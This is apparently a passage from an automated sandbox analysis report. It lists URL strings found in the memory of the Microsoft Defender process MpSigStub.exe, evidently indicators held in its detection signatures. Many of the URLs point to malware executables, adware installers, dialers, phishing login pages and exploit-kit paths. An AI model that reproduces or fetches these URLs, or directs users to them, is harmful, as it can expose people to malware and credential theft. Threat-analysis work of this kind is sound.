Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://binyousafindustries.com/fonts/jo/mops.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2er
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqnzq
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://deluvis.net/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://dhm-mhn.com/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://dimas.stifar.ac.id/vjrzzufsu/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://diydaddy.us/cgi-bin/8f_i
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://dl.dqwjnewkwefewamail.com/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://dl.river-store.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://down.admin7a57a5a743894a0e.club/4.exe
Source: MpSigStub.exe, 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://download.softobase.com/ru/xL
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://download1.ihyip.pw/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://downloads-full.com.br/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://downtown.crstycricri.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://dwaplord2018.tk/doc/purchaseorder.doc
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://dxcodec.com/uninstall/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://egomam.ru/neworder.doc
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://elpctchair00.net/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
